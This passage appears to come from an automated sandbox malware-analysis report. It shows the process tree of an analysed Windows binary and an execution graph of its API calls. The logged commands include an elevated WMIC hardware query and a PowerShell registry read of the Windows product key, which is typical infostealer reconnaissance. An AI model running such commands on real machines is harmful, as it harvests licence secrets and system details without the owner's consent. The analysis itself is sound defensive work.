                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:82
                                                                                                                                                                                                                                          Start time:04:44:31
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:83
                                                                                                                                                                                                                                          Start time:04:44:31
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                          Imagebase:0x7ff7374d0000
                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:84
                                                                                                                                                                                                                                          Start time:04:44:32
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:85
                                                                                                                                                                                                                                          Start time:04:44:32
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:86
                                                                                                                                                                                                                                          Start time:04:44:32
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:8.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:20.1%
                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                            Total number of Limit Nodes:23
                                                                                                                                                                                                                                            execution_graph 18913 7ff633d7c520 18924 7ff633d802d8 EnterCriticalSection 18913->18924 18698 7ff633d75628 18699 7ff633d75642 18698->18699 18700 7ff633d7565f 18698->18700 18702 7ff633d74ee8 _fread_nolock 11 API calls 18699->18702 18700->18699 18701 7ff633d75672 CreateFileW 18700->18701 18703 7ff633d756dc 18701->18703 18704 7ff633d756a6 18701->18704 18705 7ff633d75647 18702->18705 18749 7ff633d75c04 18703->18749 18723 7ff633d7577c GetFileType 18704->18723 18708 7ff633d74f08 _get_daylight 11 API calls 18705->18708 18709 7ff633d7564f 18708->18709 18712 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 18709->18712 18718 7ff633d7565a 18712->18718 18713 7ff633d756bb CloseHandle 18713->18718 18714 7ff633d756d1 CloseHandle 18714->18718 18715 7ff633d756e5 18719 7ff633d74e7c _fread_nolock 11 API calls 18715->18719 18716 7ff633d75710 18770 7ff633d759c4 18716->18770 18722 7ff633d756ef 18719->18722 18722->18718 18724 7ff633d757ca 18723->18724 18725 7ff633d75887 18723->18725 18726 7ff633d757f6 GetFileInformationByHandle 18724->18726 18730 7ff633d75b00 21 API calls 18724->18730 18727 7ff633d758b1 18725->18727 18728 7ff633d7588f 18725->18728 18731 7ff633d758a2 GetLastError 18726->18731 18732 7ff633d7581f 18726->18732 18729 7ff633d758d4 PeekNamedPipe 18727->18729 18747 7ff633d75872 18727->18747 18728->18731 18733 7ff633d75893 18728->18733 18729->18747 18739 7ff633d757e4 18730->18739 18734 7ff633d74e7c _fread_nolock 11 API calls 18731->18734 18735 7ff633d759c4 51 API calls 18732->18735 18736 7ff633d74f08 _get_daylight 11 API calls 18733->18736 18734->18747 18737 7ff633d7582a 18735->18737 18736->18747 18787 7ff633d75924 18737->18787 18738 7ff633d6c550 _log10_special 8 API calls 18741 7ff633d756b4 18738->18741 18739->18726 18739->18747 18741->18713 18741->18714 18743 7ff633d75924 10 API calls 18744 7ff633d75849 18743->18744 18745 7ff633d75924 10 API calls 18744->18745 18746 7ff633d7585a 18745->18746 18746->18747 18748 7ff633d74f08 _get_daylight 11 API calls 18746->18748 18747->18738 18748->18747 18750 7ff633d75c3a 18749->18750 18751 7ff633d74f08 _get_daylight 11 API calls 18750->18751 18769 7ff633d75cd2 __std_exception_copy 18750->18769 18753 7ff633d75c4c 18751->18753 18752 7ff633d6c550 _log10_special 8 API calls 18754 7ff633d756e1 18752->18754 18755 7ff633d74f08 _get_daylight 11 API calls 18753->18755 18754->18715 18754->18716 18756 7ff633d75c54 18755->18756 18757 7ff633d77e08 45 API calls 18756->18757 18758 7ff633d75c69 18757->18758 18759 7ff633d75c7b 18758->18759 18760 7ff633d75c71 18758->18760 18762 7ff633d74f08 _get_daylight 11 API calls 18759->18762 18761 7ff633d74f08 _get_daylight 11 API calls 18760->18761 18766 7ff633d75c76 18761->18766 18763 7ff633d75c80 18762->18763 18764 7ff633d74f08 _get_daylight 11 API calls 18763->18764 18763->18769 18765 7ff633d75c8a 18764->18765 18767 7ff633d77e08 45 API calls 18765->18767 18768 7ff633d75cc4 GetDriveTypeW 18766->18768 18766->18769 18767->18766 18768->18769 18769->18752 18772 7ff633d759ec 18770->18772 18771 7ff633d7571d 18780 7ff633d75b00 18771->18780 18772->18771 18794 7ff633d7f724 18772->18794 18774 7ff633d75a80 18774->18771 18775 7ff633d7f724 51 API calls 18774->18775 18776 7ff633d75a93 18775->18776 18776->18771 18777 7ff633d7f724 51 API calls 18776->18777 18778 7ff633d75aa6 18777->18778 18778->18771 18779 7ff633d7f724 51 API calls 18778->18779 18779->18771 18781 7ff633d75b1a 18780->18781 18782 7ff633d75b51 18781->18782 18783 7ff633d75b2a 18781->18783 18784 7ff633d7f5b8 21 API calls 18782->18784 18785 7ff633d74e7c _fread_nolock 11 API calls 18783->18785 18786 7ff633d75b3a 18783->18786 18784->18786 18785->18786 18786->18722 18788 7ff633d7594d FileTimeToSystemTime 18787->18788 18789 7ff633d75940 18787->18789 18790 7ff633d75961 SystemTimeToTzSpecificLocalTime 18788->18790 18791 7ff633d75948 18788->18791 18789->18788 18789->18791 18790->18791 18792 7ff633d6c550 _log10_special 8 API calls 18791->18792 18793 7ff633d75839 18792->18793 18793->18743 18795 7ff633d7f731 18794->18795 18796 7ff633d7f755 18794->18796 18795->18796 18797 7ff633d7f736 18795->18797 18798 7ff633d7f78f 18796->18798 18801 7ff633d7f7ae 18796->18801 18799 7ff633d74f08 _get_daylight 11 API calls 18797->18799 18800 7ff633d74f08 _get_daylight 11 API calls 18798->18800 18802 7ff633d7f73b 18799->18802 18803 7ff633d7f794 18800->18803 18804 7ff633d74f4c 45 API calls 18801->18804 18805 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 18802->18805 18806 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 18803->18806 18810 7ff633d7f7bb 18804->18810 18807 7ff633d7f746 18805->18807 18809 7ff633d7f79f 18806->18809 18807->18774 18808 7ff633d804dc 51 API calls 18808->18810 18809->18774 18810->18808 18810->18809 19785 7ff633d816b0 19796 7ff633d873e4 19785->19796 19797 7ff633d873f1 19796->19797 19798 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19797->19798 19799 7ff633d8740d 19797->19799 19798->19797 19800 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19799->19800 19801 7ff633d816b9 19799->19801 19800->19799 19802 7ff633d802d8 EnterCriticalSection 19801->19802 20224 7ff633d8adfe 20225 7ff633d8ae17 20224->20225 20226 7ff633d8ae0d 20224->20226 20228 7ff633d80338 LeaveCriticalSection 20226->20228 20433 7ff633d7f98c 20434 7ff633d7fb7e 20433->20434 20437 7ff633d7f9ce _isindst 20433->20437 20435 7ff633d74f08 _get_daylight 11 API calls 20434->20435 20436 7ff633d7fb6e 20435->20436 20438 7ff633d6c550 _log10_special 8 API calls 20436->20438 20437->20434 20440 7ff633d7fa4e _isindst 20437->20440 20439 7ff633d7fb99 20438->20439 20454 7ff633d86194 20440->20454 20445 7ff633d7fbaa 20447 7ff633d7a900 _isindst 17 API calls 20445->20447 20449 7ff633d7fbbe 20447->20449 20452 7ff633d7faab 20452->20436 20478 7ff633d861d8 20452->20478 20455 7ff633d861a3 20454->20455 20456 7ff633d7fa6c 20454->20456 20485 7ff633d802d8 EnterCriticalSection 20455->20485 20460 7ff633d85598 20456->20460 20461 7ff633d855a1 20460->20461 20462 7ff633d7fa81 20460->20462 20463 7ff633d74f08 _get_daylight 11 API calls 20461->20463 20462->20445 20466 7ff633d855c8 20462->20466 20464 7ff633d855a6 20463->20464 20465 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 20464->20465 20465->20462 20467 7ff633d7fa92 20466->20467 20468 7ff633d855d1 20466->20468 20467->20445 20472 7ff633d855f8 20467->20472 20469 7ff633d74f08 _get_daylight 11 API calls 20468->20469 20470 7ff633d855d6 20469->20470 20471 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 20470->20471 20471->20467 20473 7ff633d7faa3 20472->20473 20474 7ff633d85601 20472->20474 20473->20445 20473->20452 20475 7ff633d74f08 _get_daylight 11 API calls 20474->20475 20476 7ff633d85606 20475->20476 20477 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 20476->20477 20477->20473 20486 7ff633d802d8 EnterCriticalSection 20478->20486 20229 7ff633d75410 20230 7ff633d7541b 20229->20230 20238 7ff633d7f2a4 20230->20238 20251 7ff633d802d8 EnterCriticalSection 20238->20251 20261 7ff633d8abe3 20262 7ff633d8abf3 20261->20262 20265 7ff633d75478 LeaveCriticalSection 20262->20265 18811 7ff633d6bae0 18812 7ff633d6bb0e 18811->18812 18813 7ff633d6baf5 18811->18813 18813->18812 18815 7ff633d7d5fc 12 API calls 18813->18815 18814 7ff633d6bb6e 18815->18814 18816 7ff633d79961 18817 7ff633d7a3d8 45 API calls 18816->18817 18818 7ff633d79966 18817->18818 18819 7ff633d7998d GetModuleHandleW 18818->18819 18820 7ff633d799d7 18818->18820 18819->18820 18826 7ff633d7999a 18819->18826 18828 7ff633d79864 18820->18828 18826->18820 18842 7ff633d79a88 GetModuleHandleExW 18826->18842 18848 7ff633d802d8 EnterCriticalSection 18828->18848 18843 7ff633d79abc GetProcAddress 18842->18843 18844 7ff633d79ae5 18842->18844 18845 7ff633d79ace 18843->18845 18846 7ff633d79aea FreeLibrary 18844->18846 18847 7ff633d79af1 18844->18847 18845->18844 18846->18847 18847->18820 20528 7ff633d8ad69 20531 7ff633d75478 LeaveCriticalSection 20528->20531 15894 7ff633d6cc3c 15915 7ff633d6ce0c 15894->15915 15897 7ff633d6cd88 16069 7ff633d6d12c IsProcessorFeaturePresent 15897->16069 15898 7ff633d6cc58 __scrt_acquire_startup_lock 15900 7ff633d6cd92 15898->15900 15906 7ff633d6cc76 __scrt_release_startup_lock 15898->15906 15901 7ff633d6d12c 7 API calls 15900->15901 15903 7ff633d6cd9d __GetCurrentState 15901->15903 15902 7ff633d6cc9b 15904 7ff633d6cd21 15921 7ff633d6d274 15904->15921 15906->15902 15906->15904 16058 7ff633d79b2c 15906->16058 15907 7ff633d6cd26 15924 7ff633d61000 15907->15924 15912 7ff633d6cd49 15912->15903 16065 7ff633d6cf90 15912->16065 15916 7ff633d6ce14 15915->15916 15917 7ff633d6ce20 __scrt_dllmain_crt_thread_attach 15916->15917 15918 7ff633d6cc50 15917->15918 15919 7ff633d6ce2d 15917->15919 15918->15897 15918->15898 15919->15918 16076 7ff633d6d888 15919->16076 16103 7ff633d8a4d0 15921->16103 15925 7ff633d61009 15924->15925 16105 7ff633d75484 15925->16105 15927 7ff633d637fb 16112 7ff633d636b0 15927->16112 15933 7ff633d6391b 16281 7ff633d645c0 15933->16281 15934 7ff633d6383c 16272 7ff633d61c80 15934->16272 15938 7ff633d6385b 16184 7ff633d68830 15938->16184 15941 7ff633d6396a 16304 7ff633d62710 15941->16304 15943 7ff633d6388e 15951 7ff633d638bb __std_exception_copy 15943->15951 16276 7ff633d689a0 15943->16276 15945 7ff633d6395d 15946 7ff633d63962 15945->15946 15947 7ff633d63984 15945->15947 16300 7ff633d7004c 15946->16300 15949 7ff633d61c80 49 API calls 15947->15949 15952 7ff633d639a3 15949->15952 15953 7ff633d68830 14 API calls 15951->15953 15960 7ff633d638de __std_exception_copy 15951->15960 15957 7ff633d61950 115 API calls 15952->15957 15953->15960 15955 7ff633d63a0b 15956 7ff633d689a0 40 API calls 15955->15956 15958 7ff633d63a17 15956->15958 15959 7ff633d639ce 15957->15959 15961 7ff633d689a0 40 API calls 15958->15961 15959->15938 15962 7ff633d639de 15959->15962 15966 7ff633d6390e __std_exception_copy 15960->15966 16315 7ff633d68940 15960->16315 15963 7ff633d63a23 15961->15963 15964 7ff633d62710 54 API calls 15962->15964 15965 7ff633d689a0 40 API calls 15963->15965 16057 7ff633d63808 __std_exception_copy 15964->16057 15965->15966 15967 7ff633d68830 14 API calls 15966->15967 15968 7ff633d63a3b 15967->15968 15969 7ff633d63b2f 15968->15969 15970 7ff633d63a60 __std_exception_copy 15968->15970 15971 7ff633d62710 54 API calls 15969->15971 15972 7ff633d68940 40 API calls 15970->15972 15983 7ff633d63aab 15970->15983 15971->16057 15972->15983 15973 7ff633d68830 14 API calls 15974 7ff633d63bf4 __std_exception_copy 15973->15974 15975 7ff633d63c46 15974->15975 15976 7ff633d63d41 15974->15976 15977 7ff633d63cd4 15975->15977 15978 7ff633d63c50 15975->15978 16331 7ff633d644e0 15976->16331 15981 7ff633d68830 14 API calls 15977->15981 16197 7ff633d690e0 15978->16197 15985 7ff633d63ce0 15981->15985 15982 7ff633d63d4f 15986 7ff633d63d65 15982->15986 15987 7ff633d63d71 15982->15987 15983->15973 15988 7ff633d63c61 15985->15988 15991 7ff633d63ced 15985->15991 16334 7ff633d64630 15986->16334 15990 7ff633d61c80 49 API calls 15987->15990 15994 7ff633d62710 54 API calls 15988->15994 16000 7ff633d63cc8 __std_exception_copy 15990->16000 15995 7ff633d61c80 49 API calls 15991->15995 15994->16057 15998 7ff633d63d0b 15995->15998 15996 7ff633d63dbc 16247 7ff633d69390 15996->16247 15998->16000 16001 7ff633d63d12 15998->16001 15999 7ff633d63dcf SetDllDirectoryW 16005 7ff633d63e02 15999->16005 16047 7ff633d63e52 15999->16047 16000->15996 16002 7ff633d63da7 LoadLibraryExW 16000->16002 16004 7ff633d62710 54 API calls 16001->16004 16002->15996 16004->16057 16007 7ff633d68830 14 API calls 16005->16007 16006 7ff633d64000 16009 7ff633d6400a PostMessageW GetMessageW 16006->16009 16010 7ff633d6402d 16006->16010 16014 7ff633d63e0e __std_exception_copy 16007->16014 16008 7ff633d63f13 16252 7ff633d633c0 16008->16252 16009->16010 16411 7ff633d63360 16010->16411 16017 7ff633d63eea 16014->16017 16021 7ff633d63e46 16014->16021 16020 7ff633d68940 40 API calls 16017->16020 16020->16047 16021->16047 16337 7ff633d66dc0 16021->16337 16047->16006 16047->16008 16322 7ff633d6c550 16057->16322 16059 7ff633d79b64 16058->16059 16060 7ff633d79b43 16058->16060 18649 7ff633d7a3d8 16059->18649 16060->15904 16063 7ff633d6d2b8 GetModuleHandleW 16064 7ff633d6d2c9 16063->16064 16064->15912 16066 7ff633d6cfa1 16065->16066 16067 7ff633d6cd60 16066->16067 16068 7ff633d6d888 7 API calls 16066->16068 16067->15902 16068->16067 16070 7ff633d6d152 __GetCurrentState memcpy_s 16069->16070 16071 7ff633d6d171 RtlCaptureContext RtlLookupFunctionEntry 16070->16071 16072 7ff633d6d19a RtlVirtualUnwind 16071->16072 16073 7ff633d6d1d6 memcpy_s 16071->16073 16072->16073 16074 7ff633d6d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16073->16074 16075 7ff633d6d256 __GetCurrentState 16074->16075 16075->15900 16077 7ff633d6d89a 16076->16077 16078 7ff633d6d890 16076->16078 16077->15918 16082 7ff633d6dc24 16078->16082 16083 7ff633d6dc33 16082->16083 16085 7ff633d6d895 16082->16085 16090 7ff633d6de60 16083->16090 16086 7ff633d6dc90 16085->16086 16087 7ff633d6dcbb 16086->16087 16088 7ff633d6dc9e DeleteCriticalSection 16087->16088 16089 7ff633d6dcbf 16087->16089 16088->16087 16089->16077 16094 7ff633d6dcc8 16090->16094 16095 7ff633d6ddb2 TlsFree 16094->16095 16101 7ff633d6dd0c __vcrt_FlsAlloc 16094->16101 16096 7ff633d6dd3a LoadLibraryExW 16098 7ff633d6dd5b GetLastError 16096->16098 16099 7ff633d6ddd9 16096->16099 16097 7ff633d6ddf9 GetProcAddress 16097->16095 16098->16101 16099->16097 16100 7ff633d6ddf0 FreeLibrary 16099->16100 16100->16097 16101->16095 16101->16096 16101->16097 16102 7ff633d6dd7d LoadLibraryExW 16101->16102 16102->16099 16102->16101 16104 7ff633d6d28b GetStartupInfoW 16103->16104 16104->15907 16106 7ff633d7f480 16105->16106 16108 7ff633d7f526 16106->16108 16109 7ff633d7f4d3 16106->16109 16434 7ff633d7f358 16108->16434 16424 7ff633d7a814 16109->16424 16111 7ff633d7f4fc 16111->15927 16541 7ff633d6c850 16112->16541 16115 7ff633d636eb GetLastError 16548 7ff633d62c50 16115->16548 16116 7ff633d63710 16543 7ff633d69280 FindFirstFileExW 16116->16543 16119 7ff633d63706 16124 7ff633d6c550 _log10_special 8 API calls 16119->16124 16121 7ff633d6377d 16574 7ff633d69440 16121->16574 16122 7ff633d63723 16563 7ff633d69300 CreateFileW 16122->16563 16127 7ff633d637b5 16124->16127 16126 7ff633d6378b 16126->16119 16131 7ff633d62810 49 API calls 16126->16131 16127->16057 16134 7ff633d61950 16127->16134 16129 7ff633d6374c __vcrt_FlsAlloc 16129->16121 16130 7ff633d63734 16566 7ff633d62810 16130->16566 16131->16119 16135 7ff633d645c0 108 API calls 16134->16135 16137 7ff633d61985 16135->16137 16136 7ff633d61c43 16138 7ff633d6c550 _log10_special 8 API calls 16136->16138 16137->16136 16139 7ff633d67f90 83 API calls 16137->16139 16140 7ff633d61c5e 16138->16140 16141 7ff633d619cb 16139->16141 16140->15933 16140->15934 16183 7ff633d61a03 16141->16183 16979 7ff633d706d4 16141->16979 16143 7ff633d7004c 74 API calls 16143->16136 16144 7ff633d619e5 16145 7ff633d619e9 16144->16145 16146 7ff633d61a08 16144->16146 16147 7ff633d74f08 _get_daylight 11 API calls 16145->16147 16983 7ff633d7039c 16146->16983 16149 7ff633d619ee 16147->16149 16986 7ff633d62910 16149->16986 16152 7ff633d61a26 16154 7ff633d74f08 _get_daylight 11 API calls 16152->16154 16153 7ff633d61a45 16157 7ff633d61a7b 16153->16157 16158 7ff633d61a5c 16153->16158 16155 7ff633d61a2b 16154->16155 16156 7ff633d62910 54 API calls 16155->16156 16156->16183 16160 7ff633d61c80 49 API calls 16157->16160 16159 7ff633d74f08 _get_daylight 11 API calls 16158->16159 16161 7ff633d61a61 16159->16161 16162 7ff633d61a92 16160->16162 16163 7ff633d62910 54 API calls 16161->16163 16164 7ff633d61c80 49 API calls 16162->16164 16163->16183 16165 7ff633d61add 16164->16165 16166 7ff633d706d4 73 API calls 16165->16166 16167 7ff633d61b01 16166->16167 16168 7ff633d61b16 16167->16168 16169 7ff633d61b35 16167->16169 16171 7ff633d74f08 _get_daylight 11 API calls 16168->16171 16170 7ff633d7039c _fread_nolock 53 API calls 16169->16170 16172 7ff633d61b4a 16170->16172 16173 7ff633d61b1b 16171->16173 16175 7ff633d61b6f 16172->16175 16176 7ff633d61b50 16172->16176 16174 7ff633d62910 54 API calls 16173->16174 16174->16183 17001 7ff633d70110 16175->17001 16177 7ff633d74f08 _get_daylight 11 API calls 16176->16177 16179 7ff633d61b55 16177->16179 16181 7ff633d62910 54 API calls 16179->16181 16181->16183 16182 7ff633d62710 54 API calls 16182->16183 16183->16143 16185 7ff633d6883a 16184->16185 16186 7ff633d69390 2 API calls 16185->16186 16187 7ff633d68859 GetEnvironmentVariableW 16186->16187 16188 7ff633d68876 ExpandEnvironmentStringsW 16187->16188 16189 7ff633d688c2 16187->16189 16188->16189 16190 7ff633d68898 16188->16190 16191 7ff633d6c550 _log10_special 8 API calls 16189->16191 16193 7ff633d69440 2 API calls 16190->16193 16192 7ff633d688d4 16191->16192 16192->15943 16194 7ff633d688aa 16193->16194 16195 7ff633d6c550 _log10_special 8 API calls 16194->16195 16196 7ff633d688ba 16195->16196 16196->15943 16198 7ff633d690f5 16197->16198 17219 7ff633d68570 GetCurrentProcess OpenProcessToken 16198->17219 16201 7ff633d68570 7 API calls 16202 7ff633d69121 16201->16202 16203 7ff633d6913a 16202->16203 16204 7ff633d69154 16202->16204 16205 7ff633d626b0 48 API calls 16203->16205 16206 7ff633d626b0 48 API calls 16204->16206 16207 7ff633d69152 16205->16207 16208 7ff633d69167 LocalFree LocalFree 16206->16208 16207->16208 16209 7ff633d69183 16208->16209 16212 7ff633d6918f 16208->16212 17229 7ff633d62b50 16209->17229 16211 7ff633d6c550 _log10_special 8 API calls 16213 7ff633d63c55 16211->16213 16212->16211 16213->15988 16214 7ff633d68660 16213->16214 16215 7ff633d68678 16214->16215 16216 7ff633d6869c 16215->16216 16217 7ff633d686fa GetTempPathW GetCurrentProcessId 16215->16217 16219 7ff633d68830 14 API calls 16216->16219 17238 7ff633d625c0 16217->17238 16220 7ff633d686a8 16219->16220 17245 7ff633d681d0 16220->17245 16227 7ff633d68728 __std_exception_copy 16233 7ff633d68765 __std_exception_copy 16227->16233 17242 7ff633d78b68 16227->17242 16232 7ff633d6c550 _log10_special 8 API calls 16234 7ff633d63cbb 16232->16234 16238 7ff633d69390 2 API calls 16233->16238 16246 7ff633d687d4 __std_exception_copy 16233->16246 16234->15988 16234->16000 16239 7ff633d687b1 16238->16239 16240 7ff633d687e9 16239->16240 16241 7ff633d687b6 16239->16241 16243 7ff633d78238 38 API calls 16240->16243 16242 7ff633d69390 2 API calls 16241->16242 16243->16246 16246->16232 16248 7ff633d693b2 MultiByteToWideChar 16247->16248 16249 7ff633d693d6 16247->16249 16248->16249 16251 7ff633d693ec __std_exception_copy 16248->16251 16250 7ff633d693f3 MultiByteToWideChar 16249->16250 16249->16251 16250->16251 16251->15999 16264 7ff633d633ce memcpy_s 16252->16264 16253 7ff633d6c550 _log10_special 8 API calls 16254 7ff633d63664 16253->16254 16254->16057 16271 7ff633d690c0 LocalFree 16254->16271 16255 7ff633d635c7 16255->16253 16257 7ff633d61c80 49 API calls 16257->16264 16258 7ff633d635e2 16260 7ff633d62710 54 API calls 16258->16260 16260->16255 16263 7ff633d635c9 16266 7ff633d62710 54 API calls 16263->16266 16264->16255 16264->16257 16264->16258 16264->16263 16265 7ff633d62a50 54 API calls 16264->16265 16269 7ff633d635d0 16264->16269 17534 7ff633d64560 16264->17534 17540 7ff633d67e20 16264->17540 17552 7ff633d61600 16264->17552 17600 7ff633d67120 16264->17600 17604 7ff633d64190 16264->17604 17648 7ff633d64450 16264->17648 16265->16264 16266->16255 16270 7ff633d62710 54 API calls 16269->16270 16270->16255 16273 7ff633d61ca5 16272->16273 16274 7ff633d74984 49 API calls 16273->16274 16275 7ff633d61cc8 16274->16275 16275->15938 16277 7ff633d69390 2 API calls 16276->16277 16278 7ff633d689b4 16277->16278 16279 7ff633d78238 38 API calls 16278->16279 16280 7ff633d689c6 __std_exception_copy 16279->16280 16280->15951 16282 7ff633d645cc 16281->16282 16283 7ff633d69390 2 API calls 16282->16283 16284 7ff633d645f4 16283->16284 16285 7ff633d69390 2 API calls 16284->16285 16286 7ff633d64607 16285->16286 17831 7ff633d75f94 16286->17831 16289 7ff633d6c550 _log10_special 8 API calls 16290 7ff633d6392b 16289->16290 16290->15941 16291 7ff633d67f90 16290->16291 16292 7ff633d67fb4 16291->16292 16293 7ff633d706d4 73 API calls 16292->16293 16298 7ff633d6808b __std_exception_copy 16292->16298 16294 7ff633d67fd0 16293->16294 16294->16298 18223 7ff633d778c8 16294->18223 16296 7ff633d706d4 73 API calls 16299 7ff633d67fe5 16296->16299 16297 7ff633d7039c _fread_nolock 53 API calls 16297->16299 16298->15945 16299->16296 16299->16297 16299->16298 16301 7ff633d7007c 16300->16301 18238 7ff633d6fe28 16301->18238 16303 7ff633d70095 16303->15941 16305 7ff633d6c850 16304->16305 16306 7ff633d62734 GetCurrentProcessId 16305->16306 16307 7ff633d61c80 49 API calls 16306->16307 16308 7ff633d62787 16307->16308 16309 7ff633d74984 49 API calls 16308->16309 16310 7ff633d627cf 16309->16310 16311 7ff633d62620 12 API calls 16310->16311 16312 7ff633d627f1 16311->16312 16313 7ff633d6c550 _log10_special 8 API calls 16312->16313 16314 7ff633d62801 16313->16314 16314->16057 16316 7ff633d69390 2 API calls 16315->16316 16317 7ff633d6895c 16316->16317 16318 7ff633d69390 2 API calls 16317->16318 16319 7ff633d6896c 16318->16319 16320 7ff633d78238 38 API calls 16319->16320 16321 7ff633d6897a __std_exception_copy 16320->16321 16321->15955 16325 7ff633d6c559 16322->16325 16323 7ff633d6c8e0 IsProcessorFeaturePresent 16326 7ff633d6c8f8 16323->16326 16324 7ff633d63ca7 16324->16063 16325->16323 16325->16324 18249 7ff633d6cad8 RtlCaptureContext 16326->18249 16332 7ff633d61c80 49 API calls 16331->16332 16333 7ff633d644fd 16332->16333 16333->15982 16335 7ff633d61c80 49 API calls 16334->16335 16336 7ff633d64660 16335->16336 16336->16000 16336->16336 16338 7ff633d66dd5 16337->16338 16339 7ff633d63e64 16338->16339 16340 7ff633d74f08 _get_daylight 11 API calls 16338->16340 16343 7ff633d67340 16339->16343 16341 7ff633d66de2 16340->16341 16342 7ff633d62910 54 API calls 16341->16342 16342->16339 18254 7ff633d61470 16343->18254 16345 7ff633d67368 18360 7ff633d66360 16411->18360 16419 7ff633d63399 16420 7ff633d63670 16419->16420 16441 7ff633d7a55c 16424->16441 16428 7ff633d7a84f 16428->16111 16540 7ff633d7546c EnterCriticalSection 16434->16540 16442 7ff633d7a578 GetLastError 16441->16442 16443 7ff633d7a5b3 16441->16443 16444 7ff633d7a588 16442->16444 16443->16428 16447 7ff633d7a5c8 16443->16447 16454 7ff633d7b390 16444->16454 16448 7ff633d7a5fc 16447->16448 16449 7ff633d7a5e4 GetLastError SetLastError 16447->16449 16448->16428 16450 7ff633d7a900 